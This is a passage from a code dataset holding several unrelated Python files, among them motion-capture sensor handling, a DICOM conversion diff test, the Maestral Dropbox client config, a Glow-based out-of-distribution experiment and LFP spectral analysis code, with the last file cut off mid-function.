selectedRig, selectedBone ):\n\treturn runtime.transformationMatrix[selectedRig][selectedBone]\n\n#\n#\tProcess given data object,\n#\tthat was passed through the socket.\n#\tNo verification done yet\n#\n#\t@param dictionary data\ndef processData( data ):\n\tif runtime.debug:\n\t\tutils.logData( data )\n\t\n\tif 'selectedRig' not in data or 'selectedBone' not in data:\n\t\treturn\n\t\t\n\tif 'values' not in data or 'transformationMatrix' not in data['values']:\n\t\treturn\n\t\n\tselectedRig = data['selectedRig']\n\tselectedBone = data['selectedBone']\n\t\n\tsetTransformationMatrix( selectedRig, selectedBone, data['values']['transformationMatrix'] )\t\n\tinsertSensorData( selectedRig, selectedBone, data )\n\t\n\tapplyTransformations( selectedRig, selectedBone )\n\t\n#\n#\tApplies a rotation and translation to the bone,\n#\tthat is identified by given rig and bone.\n#\tRotation and translation will be calculated by using \n#\tthe sensor data that were currently at the end of the\n#\tqueue of the according sensor objects\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef applyTransformations( selectedRig, selectedBone ):\n\tbone = getBoneByData( selectedRig, selectedBone )\n\t\n\tdeltaOrientation = getDeltaOrientation( selectedRig, selectedBone )\n\tdeltaTranslation = getDeltaTranslation( selectedRig, selectedBone )\n\t\n\trotationMatrix = matrix_generator.getRotationMatrix( deltaOrientation )\n\ttranslationMatrix = matrix_generator.getTranslationMatrix( deltaTranslation )\n\t\n\tbone.matrix *= (rotationMatrix * translationMatrix)\n\n#\n#\tProcesses the given sensor data and distributes\n#\tit to the different sensor objects\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary data\ndef insertSensorData( selectedRig, selectedBone, data ):\n\ttime = getTimeDiffForBone( selectedRig, selectedBone, data ) / millisecondsPerSecond\n\t\n\tif 'values' in data:\n\t\tvalues = data['values']\n\t\n\tinsertAccelerometerData( selectedRig, selectedBone, values, time )\n\tinsertGyroscopeData( selectedRig, selectedBone, values, time )\n\tinsertMagneticFieldData( selectedRig, selectedBone, values, time )\n\t\n#\n#\tHandles the given accelerometer data and adds it to the proper sensor object\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary values\n#\t@param integer time\ndef insertAccelerometerData( selectedRig, 
selectedBone, values, time ):\n\taccelerometerValues = []\n\t\n\tif 'accelerometer' in values:\n\t\tset = values['accelerometer']\n\t\tif 'x' in set and 'y' in set and 'z' in set:\n\t\t\taccelerometerValues.append( set['x'] )\n\t\t\taccelerometerValues.append( set['y'] )\n\t\t\taccelerometerValues.append( set['z'] )\n\n\tif len(accelerometerValues) == 3:\n\t\taccelerometerValues = filter.subtractGravity( accelerometerValues )\n\t\taccelerometerRecord.insert(selectedRig, selectedBone, time, accelerometerValues)\n\n#\n#\tHandles the given gyroscope data and adds it to the proper sensor object\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary values\n#\t@param integer time\ndef insertGyroscopeData( selectedRig, selectedBone, values, time ):\n\tgyroscopeValues = []\n\t\n\tif 'gyroscope' in values:\n\t\tset = values['gyroscope']\n\t\tif 'x' in set and 'y' in set and 'z' in set:\n\t\t\tgyroscopeValues.append( set['x'] )\n\t\t\tgyroscopeValues.append( set['y'] )\n\t\t\tgyroscopeValues.append( set['z'] )\n\t\t\t\t\n\tif len(gyroscopeValues) == 3:\n\t\tgyroscopeRecord.insert(selectedRig, selectedBone, time, gyroscopeValues)\n\n#\n#\tHandles the given magnetic field data and adds it to the proper sensor object\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary values\ndef insertMagneticFieldData( selectedRig, selectedBone, values, time):\n\tmagneticFieldValues = []\n\t\n\tif 'magnetic' in values:\n\t\tset = values['magnetic']\n\t\tif 'x' in set and 'y' in set and 'z' in set:\n\t\t\tmagneticFieldValues.append( set['x'] )\n\t\t\tmagneticFieldValues.append( set['y'] )\n\t\t\tmagneticFieldValues.append( set['z'] )\n\t\t\t\t\n\tif len(magneticFieldValues) == 3:\n\t\tmagneticFieldSensorRecord.insert(selectedRig, selectedBone, time, magneticFieldValues)\t\n\n#\n#\tReturns the time difference between the\n#\tcurrent data package and the last (in milliseconds)\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary data\ndef getTimeDiffForBone( selectedRig, selectedBone, data ):\n\tif 'timestamp' not in data:\n\t\treturn 0\n\t\n\ttime = data['timestamp']\n\t\n\tif selectedRig not in runtime.firstTS:\n\t\truntime.firstTS[selectedRig] = {}\n\t\t\n\t\tif selectedBone not in runtime.firstTS[selectedRig]:\n\t\t\truntime.firstTS[selectedRig][selectedBone] = time\n\t\t\n\treturn (time - runtime.firstTS[selectedRig][selectedBone])","sub_path":"mocap.py","file_name":"mocap.py","file_ext":"py","file_size_in_byte":9119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"353461871","text":"height = int(input())\nwidth = int(input())\nimg = []\nfor i in range(height):\n string = input()\n temp = [item for item in string]\n img.append(temp)\nfor cols, cells in enumerate(img):\n if cols > 0:\n img.remove(cells)\n\nfor cells in img:\n for ix, rows in enumerate(cells):\n del cells[ix]\n\nfor item in img:\n print(*item)","sub_path":"lab2/12.7.py","file_name":"12.7.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"648790240","text":"import json\nimport logging\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nimport odil\n\nimport dicomdiff\nimport jsondiff\n\ndef main():\n root = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n input_ = os.path.join(root, \"input\")\n baseline = os.path.join(root, \"baseline\")\n \n tests = [\n [\n 
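# each test case: [extra bruker2dicom arguments, input directory, expected baseline]\n            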
[],\n os.path.join(input_, \"20160718_115906_plateforme_fantome_nouille_other_1_7\"),\n os.path.join(baseline, \"20160718_115906_plateforme_fantome_nouille_other_1_7.dcm\")\n ],\n [\n [\"-m\"],\n os.path.join(input_, \"20160718_115906_plateforme_fantome_nouille_other_1_7\"),\n os.path.join(baseline, \"20160718_115906_plateforme_fantome_nouille_other_1_7.dcm.multi\")\n ],\n [\n [],\n os.path.join(input_, \"lb_140721.Bq1\"),\n os.path.join(baseline, \"lb_140721.Bq1.dcm\")\n ],\n [\n [],\n os.path.join(input_, \"lb_140721.Bx1\"),\n os.path.join(baseline, \"lb_140721.Bx1.dcm\")\n ]\n ]\n \n for arguments, case_input, case_baseline in tests:\n case_output = tempfile.mkdtemp()\n try:\n try:\n subprocess.check_call(\n [\"bruker2dicom\", \"convert\", \"--dicomdir\"]\n +arguments\n +[case_input, case_output])\n except subprocess.CalledProcessError as e:\n print(e.output)\n return\n \n diff(case_baseline, case_output)\n finally:\n shutil.rmtree(case_output)\n\ndef diff(baseline, test):\n # Walk the baseline to find missing missing in test and different from test\n for pathname, dirnames, filenames in os.walk(baseline):\n relative_pathname = pathname[len(os.path.join(baseline, \"\")):]\n test_pathname = os.path.join(test, relative_pathname)\n for filename in filenames:\n if filename == \"DICOMDIR\":\n logging.warning(\"Not testing DICOMDIR\")\n continue\n \n baseline_filename = os.path.join(pathname, filename)\n test_filename = os.path.join(test_pathname, filename)\n if not os.path.isfile(os.path.join(test_pathname, filename)):\n print(\"{} missing in test\".format(\n os.path.join(relative_pathname, filename)))\n else:\n result = dicomdiff.diff(\n baseline_filename, test_filename, True,[\n str(getattr(odil.registry, x)) for x in [\n \"MediaStorageSOPInstanceUID\", \"SOPInstanceUID\", \n \"InstanceCreationDate\", \"InstanceCreationTime\", \n \"SpecificCharacterSet\", \"ContentDate\",\n \"ContentTime\", \"EncapsulatedDocument\"]])\n \n # EncapsulatedDocument may contain different binary \n # representation of the same Bruker data set: process \n # separately\n baseline_bruker = get_encapsulated_document(baseline_filename)\n test_bruker = get_encapsulated_document(test_filename)\n if any(x is not None for x in [baseline_bruker, test_bruker]):\n differences = jsondiff.get_differences(baseline_bruker, test_bruker)\n for difference in differences:\n path = [str(x) for x in difference[0]]\n reason = difference[1]\n details = difference[2:]\n print(\n \"{} {}: {}, {}\".format(\n # Display common suffix: reverse of common prefix\n os.path.commonprefix(\n [baseline_filename[::-1], test_filename[::-1]]\n )[::-1],\n \"/\".join(path), \n reason, \" \".join(str(x) for x in details)))\n \n # Walk the test to find files missing in baseline (the difference between \n # files has already been tested).\n for pathname, dirnames, filenames in os.walk(test):\n relative_pathname = pathname[len(os.path.join(test, \"\")):]\n baseline_pathname = os.path.join(baseline, relative_pathname)\n for filename in filenames:\n if not os.path.isfile(os.path.join(baseline_pathname, filename)):\n print(\"{} missing in baseline\".format(\n os.path.join(relative_pathname, filename)))\n\ndef get_encapsulated_document(path):\n with odil.open(path, \"rb\") as fd:\n data_set = odil.Reader.read_file(fd)[1]\n if \"EncapsulatedDocument\" in data_set:\n data = data_set.as_binary(\"EncapsulatedDocument\")[0].get_memory_view().tobytes()\n return json.loads(data.decode())\n else:\n return None\n\nif __name__ == \"__main__\":\n 
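# give the module's logging.warning() calls (e.g. the DICOMDIR notice) a consistent format\n    logging.basicConfig(format='%(levelname)s: %(message)s')\n    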
sys.exit(main())\n","sub_path":"scripts/diff_bruker2dicom.py","file_name":"diff_bruker2dicom.py","file_ext":"py","file_size_in_byte":4995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"401210220","text":"# author Artem Egorov\nimport math as m\n\nnumber_of_input_points = float(input())\nmy_dict = {}\nfor i in range(26):\n letter, letter_distance = input().split()\n my_dict[letter] = float(letter_distance)\nlent = 0\nphrase_paragraph = input().replace(\" \", \"\").upper()\nonly_alpha = \"\"\nfor char in phrase_paragraph:\n if 65 <= ord(char) <= 90:\n only_alpha += char\ntemp_arr = my_dict[only_alpha[0]]\nfor i in only_alpha[1:]:\n x = my_dict[i]\n x = float(x)\n difference = 2 * number_of_input_points * abs(m.sin(m.radians((x - temp_arr) / 2)))\n temp_arr = x\n lent = lent + difference\nprint(m.ceil(lent + number_of_input_points))\n","sub_path":"Aeneas' cryptographic disc/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"357245598","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport competition.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('competition', '0013_tournament_display_margin_per_game'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='tournament',\n name='year',\n field=models.IntegerField(default=competition.models.current_year, choices=[(2016, 2016), (2017, 2017), (2018, 2018), (2019, 2019), (2020, 2020)]),\n ),\n ]\n","sub_path":"competition/migrations/0014_auto_20180302_1316.py","file_name":"0014_auto_20180302_1316.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"51304766","text":"# -*- coding: utf-8 -*-\nimport mltk\nfrom mltk.data import ArraysDataStream, DataStream\nfrom tensorkit import tensor as T\nimport sys\nfrom argparse import ArgumentParser\n\nfrom pprint import pformat\n\nfrom matplotlib import pyplot\nimport torch\n\nimport tfsnippet as spt\nfrom tfsnippet.examples.utils import (MLResults,\n print_with_title)\nimport numpy as np\n\nfrom flow_next.common import TrainConfig, DataSetConfig, make_dataset, train_model, get_mapper\nfrom flow_next.models.glow import GlowConfig, Glow\nfrom ood_regularizer.experiment.datasets.overall import load_overall, load_complexity\nfrom ood_regularizer.experiment.models.utils import get_mixed_array\nfrom ood_regularizer.experiment.utils import plot_fig, make_diagram_torch, get_ele_torch\n\nfrom utils.data import SplitInfo\nfrom utils.evaluation import dequantized_bpd\nimport torch.autograd as autograd\nfrom imgaug import augmenters as iaa\n\n\nclass ExperimentConfig(mltk.Config):\n # model parameters\n z_dim = 256\n act_norm = False\n weight_norm = False\n batch_norm = False\n l2_reg = 0.0002\n kernel_size = 3\n shortcut_kernel_size = 1\n nf_layers = 20\n\n # training parameters\n result_dir = None\n write_summary = True\n max_epoch = 400\n warm_up_start = 200\n initial_beta = -3.0\n uniform_scale = False\n use_transductive = True\n mixed_train = False\n mixed_train_epoch = 64\n mixed_train_skip = 64\n mixed_times = 64\n mixed_replace = 64\n mixed_replace_ratio = 1.0\n dynamic_epochs = False\n retrain_for_batch = True\n pretrain = True\n stand_weight = 0.1\n\n compressor = 2 # 0 for jpeg, 1 for png, 2 for flif\n\n max_step = None\n batch_size 
= 64\n smallest_step = 5e-5\n initial_lr = 0.0005\n lr_anneal_factor = 0.5\n lr_anneal_epoch_freq = []\n lr_anneal_step_freq = None\n clip_norm = 5\n\n n_critical = 5\n # evaluation parameters\n train_n_qz = 1\n test_n_qz = 10\n test_batch_size = 64\n test_epoch_freq = 200\n plot_epoch_freq = 20\n distill_ratio = 1.0\n distill_epoch = 5000\n\n epsilon = -20.0\n min_logstd_of_q = -3.0\n\n sample_n_z = 100\n\n x_shape = (32, 32, 3)\n x_shape_multiple = 3072\n extra_stride = 2\n\n train = TrainConfig(\n optimizer='adamax',\n init_batch_size=128,\n batch_size=64,\n test_batch_size=64,\n test_epoch_freq=10,\n max_epoch=50,\n # grad_global_clip_norm=None,\n grad_global_clip_norm=1.0,\n debug=True\n )\n model = GlowConfig(\n hidden_conv_activation='relu',\n hidden_conv_channels=[128, 128],\n depth=3,\n levels=3,\n )\n in_dataset = 'cifar10'\n out_dataset = 'svhn'\n count_experiment = False\n\n\ndef main():\n with mltk.Experiment(ExperimentConfig, args=sys.argv[1:]) as exp, \\\n T.use_device(T.first_gpu_device()):\n while True:\n try:\n exp.make_dirs('plotting')\n break\n except Exception:\n pass\n config = exp.config\n # prepare for training and testing data\n config.in_dataset = DataSetConfig(name=config.in_dataset)\n config.out_dataset = DataSetConfig(name=config.out_dataset)\n x_train_complexity, x_test_complexity = load_complexity(config.in_dataset.name, config.compressor)\n svhn_train_complexity, svhn_test_complexity = load_complexity(config.out_dataset.name, config.compressor)\n\n if config.count_experiment:\n with open('/home/cwx17/research/ml-workspace/projects/wasserstein-ood-regularizer/count_experiments',\n 'a') as f:\n f.write(exp.abspath(\"\") + '\\n')\n f.close()\n\n experiment_dict = {\n 'celeba': '/mnt/mfs/mlstorage-experiments/cwx17/b0/e5/02c52d867e43f4e461f5',\n 'svhn': '/mnt/mfs/mlstorage-experiments/cwx17/f9/d5/02812baa4f70f4e461f5',\n 'cifar100': '/mnt/mfs/mlstorage-experiments/cwx17/6c/d5/02732c28dc8df4e461f5',\n 'tinyimagenet': '/mnt/mfs/mlstorage-experiments/cwx17/02/e5/02279d802d3af4e461f5',\n 'cifar10': '/mnt/mfs/mlstorage-experiments/cwx17/e9/d5/02812baa4f70f4e461f5',\n 'noise': '/mnt/mfs/mlstorage-experiments/cwx17/db/d5/02812baa4f70f19e02f5',\n 'constant': '/mnt/mfs/mlstorage-experiments/cwx17/25/e5/02c52d867e43435322f5',\n 'mnist28': '/mnt/mfs/mlstorage-experiments/cwx17/80/e5/02c52d867e43f4e461f5',\n 'omniglot28': '/mnt/mfs/mlstorage-experiments/cwx17/a0/e5/02c52d867e43f4e461f5',\n 'not_mnist28': '/mnt/mfs/mlstorage-experiments/cwx17/90/e5/02c52d867e43f4e461f5',\n 'kmnist28': '/mnt/mfs/mlstorage-experiments/cwx17/12/e5/02279d802d3af4e461f5',\n 'fashion_mnist28': '/mnt/mfs/mlstorage-experiments/cwx17/7c/d5/02732c28dc8df4e461f5',\n 'noise28': '/mnt/mfs/mlstorage-experiments/cwx17/d5/e5/02732c28dc8d622303f5',\n 'constant28': '/mnt/mfs/mlstorage-experiments/cwx17/c5/e5/02732c28dc8d622303f5'\n }\n print(experiment_dict)\n if config.in_dataset.name in experiment_dict:\n restore_checkpoint = experiment_dict[config.in_dataset.name]\n else:\n restore_checkpoint = None\n print('restore model from {}'.format(restore_checkpoint))\n\n # load the dataset\n cifar_train_dataset, cifar_test_dataset, cifar_dataset = make_dataset(config.in_dataset)\n print('CIFAR DataSet loaded.')\n svhn_train_dataset, svhn_test_dataset, svhn_dataset = make_dataset(config.out_dataset)\n print('SVHN DataSet loaded.')\n\n cifar_train_flow = cifar_test_dataset.get_stream('train', 'x', config.batch_size)\n cifar_test_flow = cifar_test_dataset.get_stream('test', 'x', config.batch_size)\n svhn_train_flow = 
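svhn_test_dataset.get_stream('train', 'x', config.batch_size)\n        # note: the train flows above are built from the *_test_dataset objects, so the\n        # evaluation-time mapping (presumably without training augmentation) is applied\n        # to the training split as well; this mirrors the cifar lines above\n        svhn_train_flow = 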
svhn_test_dataset.get_stream('train', 'x', config.batch_size)\n svhn_test_flow = svhn_test_dataset.get_stream('test', 'x', config.batch_size)\n\n if restore_checkpoint is not None:\n model = torch.load(restore_checkpoint + '/model.pkl')\n else:\n # construct the model\n model = Glow(cifar_train_dataset.slots['x'], exp.config.model)\n print('Model constructed.')\n\n # train the model\n train_model(exp, model, cifar_train_dataset, cifar_test_dataset)\n\n torch.save(model, 'model.pkl')\n\n with mltk.TestLoop() as loop:\n @torch.no_grad()\n def eval_ll(x):\n x = T.from_numpy(x)\n ll, outputs = model(x)\n bpd = -dequantized_bpd(ll, cifar_train_dataset.slots['x'])\n return T.to_numpy(bpd)\n\n x_test = cifar_dataset.get_array('test', 'x')\n svhn_test = svhn_dataset.get_array('test', 'x')\n if x_test.shape[-1] == 3:\n config.stand_weight = 0.2\n print(x_test.shape)\n mixed_array = np.concatenate([\n x_test, svhn_test\n ])\n index = np.arange(0, len(mixed_array))\n np.random.shuffle(index)\n index = index[:len(index) // config.mixed_times]\n config.mixed_train_skip = config.mixed_train_skip // config.mixed_times\n config.mixed_train_epoch = config.mixed_train_epoch * config.mixed_times\n index = index[:300]\n mixed_array = mixed_array[index]\n mixed_kl = []\n\n test_mapper = get_mapper(config.in_dataset, training=False)\n train_mapper = get_mapper(config.in_dataset, training=True)\n test_mapper.fit(cifar_dataset.slots['x'])\n train_mapper.fit(cifar_dataset.slots['x'])\n mixed_stream = ArraysDataStream(\n [mixed_array], batch_size=config.batch_size, shuffle=False,\n skip_incomplete=False).map(\n lambda x: test_mapper.transform(x))\n\n mixed_ll = get_ele_torch(eval_ll, mixed_stream)\n\n def stand(base, another_arrays=None):\n mean, std = np.mean(base), np.std(base)\n return_arrays = []\n for array in another_arrays:\n return_arrays.append(-np.abs((array - mean) / std) * config.stand_weight)\n return return_arrays\n\n cifar_train_nll = get_ele_torch(eval_ll, cifar_train_flow)\n [mixed_stand] = stand(cifar_train_nll, [mixed_ll])\n\n if not config.pretrain:\n model = Glow(cifar_train_dataset.slots['x'], exp.config.model)\n torch.save(model, 'last.pkl')\n\n for i in range(0, len(mixed_array), config.mixed_train_skip):\n def data_generator():\n mixed_index = np.random.randint(i if config.retrain_for_batch else 0,\n min(len(mixed_array), i + config.mixed_train_skip),\n config.batch_size)\n\n batch_x = mixed_array[mixed_index]\n aug = iaa.Affine(\n translate_percent={'x': (-0.1, 0.1), 'y': (-0.1, 0.1)},\n # order=3, # turn on this if not just translation\n rotate=(-60, 60),\n mode='edge',\n backend='cv2'\n )\n batch_x = aug(images=batch_x)\n batch_x = train_mapper.transform(batch_x)\n ll = mixed_ll[mixed_index]\n # print(batch_x.shape)\n\n if config.distill_ratio != 1.0:\n ll_omega = eval_ll(batch_x)\n batch_index = np.argsort(ll - ll_omega)\n batch_index = batch_index[:int(len(batch_index) * config.distill_ratio)]\n batch_x = batch_x[batch_index]\n yield [T.from_numpy(batch_x)]\n\n if config.dynamic_epochs:\n repeat_epoch = int(\n config.mixed_train_epoch * len(mixed_array) / (9 * i + len(mixed_array)))\n repeat_epoch = max(1, repeat_epoch)\n else:\n repeat_epoch = config.mixed_train_epoch\n repeat_epoch = repeat_epoch * config.mixed_train_skip // config.batch_size\n # data generator generate data for each batch\n # repeat_epoch will determine how much time it generates\n exp.config.train.lr = 0.001 / 16\n exp.config.train.warmup_epochs = None\n exp.config.train.max_epoch = repeat_epoch\n 
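# test_epoch_freq is pushed past max_epoch below, so no evaluation pass should\n                # run during these short per-batch fine-tuning updates\n                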
exp.config.train.test_epoch_freq = exp.config.train.max_epoch + 1\n if config.retrain_for_batch:\n model = torch.load('last.pkl')\n try:\n train_model(exp, model, svhn_train_dataset, None,\n DataStream.generator(data_generator))\n except Exception as e:\n print(e)\n\n mixed_kl.append(get_ele_torch(eval_ll, ArraysDataStream(\n [mixed_array[i: i + config.mixed_train_skip]], batch_size=config.batch_size, shuffle=False,\n skip_incomplete=False).map(lambda x: test_mapper.transform(x))))\n loop.add_metrics(increment_process=len(mixed_kl) / len(mixed_array))\n print(mixed_kl[i] - mixed_ll[i], index[i] < len(x_test))\n\n mixed_kl = np.concatenate(mixed_kl)\n mixed_kl = mixed_kl - mixed_ll\n cifar_kl = mixed_kl[index < len(x_test)]\n svhn_kl = mixed_kl[index >= len(x_test)]\n loop.add_metrics(kl_histogram=plot_fig([-cifar_kl, -svhn_kl],\n ['red', 'green'],\n [config.in_dataset.name + ' Test',\n config.out_dataset.name + ' Test'],\n 'log(bit/dims)',\n 'kl_histogram'))\n mixed_kl = mixed_kl - mixed_stand\n cifar_kl = mixed_kl[index < len(x_test)]\n svhn_kl = mixed_kl[index >= len(x_test)]\n loop.add_metrics(kl_with_stand_histogram=plot_fig([-cifar_kl, -svhn_kl],\n ['red', 'green'],\n [config.in_dataset.name + ' Test',\n config.out_dataset.name + ' Test'], 'log(bit/dims)',\n 'kl_with_stand_histogram'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ood_regularizer/experiment/models/singleshot/glow.py","file_name":"glow.py","file_ext":"py","file_size_in_byte":12731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"476319114","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © Spyder Project Contributors\n# Licensed under the terms of the MIT License\n# (see spyder/__init__.py for details)\n\n\"\"\"\nMaestral configuration options\n\nNote: The 'account' section is used for internal purposes only to store some\nbasic information on the user account between connections. The 'internal'\nsection saves cursors and time-stamps for the last synced Dropbox state and\nlocal state, respectively. 
Resetting those to the default values will trigger\na full download on the next startup.\n\"\"\"\n\nimport os\nimport copy\nfrom .user import UserConfig\nfrom .base import get_conf_path\n\n\nPACKAGE_NAME = os.getenv('MAESTRAL_CONFIG', 'maestral')\nSUBFOLDER = 'maestral'\n\n\n# =============================================================================\n# Defaults\n# =============================================================================\n\nDEFAULTS = [\n ('main', # main settings regarding folder locations etc\n {\n 'path': '', # dropbox folder location (parent folder)\n 'default_dir_name': 'Dropbox ({})', # default dropbox folder name\n 'excluded_folders': [], # files excluded from sync, currently not supported\n 'excluded_files': [], # folders excluded from sync, currently not supported\n }\n ),\n ('account', # info on linked Dropbox account, periodically updated from servers\n {\n 'account_id': '',\n 'email': '',\n 'display_name': '',\n 'abbreviated_name': '',\n 'type': '',\n 'usage': '',\n 'usage_type': '',\n }\n ),\n ('app', # app settings\n {\n 'notifications': True, # enable / disable system tray notifications\n 'log_level': 20, # log level for file log, defaults to INFO\n 'update_notification_last': 0.0, # last notification about updates\n 'update_notification_interval': 60*60*24*7, # interval to check for updates (sec)\n 'latest_release': '0.0.0', # latest available release\n 'analytics': False, # automatically report crashes and errors with bugsnag\n }\n ),\n ('internal', # saved sync state\n {\n 'cursor': '', # remote cursor: represents last state synced from Dropbox\n 'lastsync': 0.0, # local cursor: time-stamp of last upload\n 'recent_changes': [], # cached list of recent changes to display in GUI\n }\n ),\n]\n\n\n# =============================================================================\n# Config instance\n# =============================================================================\n# IMPORTANT NOTES:\n# 1. If you want to *change* the default value of a current option, you need to\n# do a MINOR update in config version, e.g. from 3.0.0 to 3.1.0\n# 2. If you want to *remove* options that are no longer needed in our codebase,\n# or if you want to *rename* options, then you need to do a MAJOR update in\n# version, e.g. from 3.0.0 to 4.0.0\n# 3. 
You don't need to touch this value if you're just adding a new option\nCONF_VERSION = '9.1.0'\n\n\nclass MaestralConfig(object):\n \"\"\"Singleton config instance for Maestral\"\"\"\n\n _instances = {}\n\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Create new instance for a new config name, otherwise return existing instance.\n \"\"\"\n name = args[0]\n\n if name in cls._instances:\n return cls._instances[args[0]]\n else:\n defaults = copy.deepcopy(DEFAULTS)\n # set default dir name according to config\n for sec, options in defaults:\n if sec == 'main':\n options['default_dir_name'] = f'Dropbox ({name.title()})'\n\n path = get_conf_path('maestral', create=True)\n try:\n conf = UserConfig(\n path, name, defaults=defaults, version=CONF_VERSION, load=True,\n backup=True, raw_mode=True, remove_obsolete=True\n )\n except OSError:\n conf = UserConfig(\n path, name, defaults=defaults, version=CONF_VERSION, load=False,\n backup=True, raw_mode=True, remove_obsolete=True\n )\n\n conf._name = name\n\n cls._instances[args[0]] = conf\n return conf\n","sub_path":"maestral/config/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"250419715","text":"import os\nimport sys\nfrom copy import deepcopy\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom soundsig.signal import coherency\nfrom soundsig.spikes import compute_psth\nfrom soundsig.timefreq import power_spectrum_jn\nfrom zeebeez3.transforms.biosound import BiosoundTransform\nfrom zeebeez3.transforms.pairwise_cf import PairwiseCFTransform\nfrom zeebeez3.transforms.stim_event import StimEventTransform\nfrom zeebeez3.core.utils import USED_ACOUSTIC_PROPS, ROSTRAL_CAUDAL_ELECTRODES_LEFT, ROSTRAL_CAUDAL_ELECTRODES_RIGHT\n\nCOLOR_BLUE_LFP = '#0068A5'\nCOLOR_YELLOW_SPIKE = '#F0DB00'\nCOLOR_RED_SPIKE_RATE = '#E90027'\nCOLOR_PURPLE_LFP_CROSS = '#863198'\nCOLOR_CRIMSON_SPIKE_SYNC = '#610B0B'\n\n\ndef set_font(size=16):\n font = {'family': 'normal', 'weight': 'bold', 'size': size}\n matplotlib.rc('font', **font)\n matplotlib.rc('axes', labelsize=24)\n matplotlib.rc('axes', titleweight='bold')\n\n\ndef get_this_dir():\n \"\"\" Get the directory that contains the python file that is calling this function. 
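Relies on CPython frame introspection\n    via sys._current_frames(), so behaviour on other interpreters is not guaranteed.\n    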
\"\"\"\n\n f = sys._current_frames().values()[0]\n calling_file_path = f.f_back.f_globals['__file__']\n root_dir, fname = os.path.split(calling_file_path)\n return root_dir\n\n\ndef get_freqs(sample_rate, window_length=0.060, increment=None):\n if increment is None:\n increment = 2.0 / sample_rate\n nt = int(window_length * 2 * sample_rate)\n s = np.random.randn(nt)\n pfreq, psd1, ps_var, phase = power_spectrum_jn(s, sample_rate, window_length, increment)\n return pfreq\n\n\ndef get_lags_ms(sample_rate, lags=np.arange(-20, 21, 1)):\n return (lags / sample_rate) * 1e3\n\n\ndef log_transform(s):\n nz = s > 0\n s[nz] = 20 * np.log10(s[nz]) + 70\n s[s < 0] = 0\n\n\ndef compute_spectra_and_coherence_single_electrode(lfp1, lfp2, sample_rate, e1, e2,\n window_length=0.060, increment=None, log=True,\n window_fraction=0.60, noise_floor_db=25,\n lags=np.arange(-20, 21, 1), psd_stats=None):\n \"\"\"\n\n :param lfp1: An array of shape (ntrials, nt)\n :param lfp2: An array of shape (ntrials, nt)\n :return:\n \"\"\"\n\n # compute the mean (locked) spectra\n lfp1_mean = lfp1.mean(axis=0)\n lfp2_mean = lfp2.mean(axis=0)\n\n if increment is None:\n increment = 2.0 / sample_rate\n\n pfreq, psd1, ps_var, phase = power_spectrum_jn(lfp1_mean, sample_rate, window_length, increment)\n pfreq, psd2, ps_var, phase = power_spectrum_jn(lfp2_mean, sample_rate, window_length, increment)\n\n if log:\n log_transform(psd1)\n log_transform(psd2)\n\n c12 = coherency(lfp1_mean, lfp2_mean, lags, window_fraction=window_fraction, noise_floor_db=noise_floor_db)\n\n # compute the nonlocked spectra coherence\n c12_pertrial = list()\n ntrials, nt = lfp1.shape\n psd1_ms_all = list()\n psd2_ms_all = list()\n for k in range(ntrials):\n i = np.ones([ntrials], dtype='bool')\n i[k] = False\n lfp1_jn_mean = lfp1[i, :].mean(axis=0)\n lfp2_jn_mean = lfp2[i, :].mean(axis=0)\n\n lfp1_ms = lfp1[k, :] - lfp1_jn_mean\n lfp2_ms = lfp2[k, :] - lfp2_jn_mean\n\n pfreq, psd1_ms, ps_var_ms, phase_ms = power_spectrum_jn(lfp1_ms, sample_rate, window_length, increment)\n pfreq, psd2_ms, ps_var_ms, phase_ms = power_spectrum_jn(lfp2_ms, sample_rate, window_length, increment)\n if log:\n log_transform(psd1_ms)\n log_transform(psd2_ms)\n\n psd1_ms_all.append(psd1_ms)\n psd2_ms_all.append(psd2_ms)\n\n c12_ms = coherency(lfp1_ms, lfp2_ms, lags, window_fraction=window_fraction, noise_floor_db=noise_floor_db)\n c12_pertrial.append(c12_ms)\n\n psd1_ms_all = np.array(psd1_ms_all)\n psd2_ms_all = np.array(psd2_ms_all)\n psd1_ms = psd1_ms_all.mean(axis=0)\n psd2_ms = psd2_ms_all.mean(axis=0)\n\n if psd_stats is not None:\n psd_mean1, psd_std1 = psd_stats[e1]\n psd_mean2, psd_std2 = psd_stats[e2]\n psd1 -= psd_mean1\n psd1 /= psd_std1\n psd2 -= psd_mean2\n psd2 /= psd_std2\n\n psd1_ms -= psd_mean1\n psd1_ms /= psd_std1\n psd2_ms -= psd_mean2\n psd2_ms /= psd_std2\n\n c12_pertrial = np.array(c12_pertrial)\n c12_nonlocked = c12_pertrial.mean(axis=0)\n\n # compute the coherence per trial then take the average\n c12_totals = list()\n for k in range(ntrials):\n c12 = coherency(lfp1[k, :], lfp2[k, :], lags, 